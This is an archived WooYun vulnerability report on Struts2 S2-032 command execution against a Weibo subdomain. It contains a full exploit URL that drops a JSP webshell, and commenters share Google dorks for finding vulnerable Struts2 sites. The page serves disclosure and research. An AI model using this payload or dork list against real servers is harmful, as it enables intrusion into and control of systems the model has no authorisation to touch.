当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0201643

漏洞标题:神器而已之微博某站命令执行

相关厂商:新浪微博

漏洞作者: 举起手来

提交时间:2016-04-27 00:44

修复时间:2016-06-11 16:00

公开时间:2016-06-11 16:00

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-27: 厂商已经确认,细节仅向厂商公开
2016-05-07: 细节向核心白帽子及相关领域专家公开
2016-05-17: 细节向普通白帽子公开
2016-05-27: 细节向实习白帽子公开
2016-06-11: 细节向公众公开

简要描述:

看到http://www.tangscan.com 上插件了,赶紧下一个测试一下。惊喜发现

详细说明:

rap.weibo2.png


看到http://www.tangscan.com 上插件了,赶紧下一个测试一下

https://rap.weibo.cn/account/mySetting.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E

漏洞证明:

rap.weibo1.png

修复方案:

升级

版权声明:转载请注明来源 举起手来@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-27 15:57

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-27 00:45 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业!)

    6666大牛逼。

  2. 2016-04-27 00:52 | 举起手来 ( 核心白帽子 | Rank:1908 漏洞数:199 | 准备好,举起手来!)

    拿神器随便报两个,凑个热闹,不多刷

  3. 2016-04-27 00:57 | 荒废的腰子 ( 普通白帽子 | Rank:263 漏洞数:30 | bug is best my friend)

    还不睡觉?

  4. 2016-04-27 01:15 | adminss ( 路人 | Rank:8 漏洞数:5 | 大菜逼)

    前排

  5. 2016-04-27 01:19 | Fu地魔 ( 路人 | Rank:14 漏洞数:5 | 无声无息)

    求工具

  6. 2016-04-27 01:37 | Winck ( 路人 | Rank:14 漏洞数:4 | 华人安全网 www.systemsec.cn 719811394)

    @举起手来 求神器

  7. 2016-04-27 08:43 | 心云 ( 普通白帽子 | Rank:440 漏洞数:113 | 有追求,才会有提高!尽快达到下一个目标!)

    66666

  8. 2016-04-27 09:28 | 宇文硕 ( 路人 | Rank:0 漏洞数:1 | 回收废旧彩电,冰箱,洗衣机,电风扇,电脑,电...)

    楼上的全部、你有一条新短消息。

  9. 2016-04-27 09:31 | 盛大网络(乌云厂商)

    求命令执行 我不信

  10. 2016-04-27 09:32 | 蓝冰 ( 普通白帽子 | Rank:725 漏洞数:61 | -.-)

    s2-032现已加入神器豪华套餐

  11. 2016-04-27 10:26 | nd230 ( 路人 | Rank:8 漏洞数:3 | 来这里向诸位大神请教!)

    神器何在?

  12. 2016-04-27 10:36 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

    @举起手来 我来帮你刷啊

  13. 2016-04-27 10:58 | dragon110 ( 路人 | Rank:4 漏洞数:3 | 其实我是龙6)

    @举起手来 求神器

  14. 2016-04-27 13:55 | sysALong ( 普通白帽子 | Rank:386 漏洞数:79 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    就报一个这个S2 这个,,, 还TM有人先报了。。。。 MD

  15. 2016-04-27 15:11 | Winck ( 路人 | Rank:14 漏洞数:4 | 华人安全网 www.systemsec.cn 719811394)

    md 真牛逼 我都找不到一个 关键字也没人分享

  16. 2016-04-27 15:31 | sysALong ( 普通白帽子 | Rank:386 漏洞数:79 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    @Winck 关键字:inurl:VloginUser.action inurl:Mail.action inurl:code.action inurl:reg.action inurl:Address.action inurl:!Index.action inurl:login.action inurl:Add.action inurl:pageslist.action inurl:action.Action inurl:Message.action inurl:Ldap.action inurl:getMul.action inurl:shouye.action inurl:logout.action inurl:Valid.action inurl:search.action inurl:Magazine.action inurl:news.action inurl:init.action inurl:Page.action inurl:create.action inurl:index2.action inurl:default.action inurl:welcome.action inurl:Name.action inurl:single.action inurl:updateForm.action inurl:SysStart.action inurl:adminlogin.action inurl:Offportal.action inurl:Buying.action inurl:Success.action inurl:exchange.action inurl:menu.action inurl:Load.action inurl:airport.action inurl:Email.action inurl:On.action inurl:show.action inurl:tain.action inurl:Login!input.action inurl:randomPicture.action

  17. 2016-04-27 16:28 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    不一定action后缀的就是有命令执行的,其他的后缀也有,比如jspx啊,do后缀啊等等。

  18. 2016-04-27 23:04 | 王十三 ( 路人 | Rank:6 漏洞数:2 )

    求前辈赐个神器。。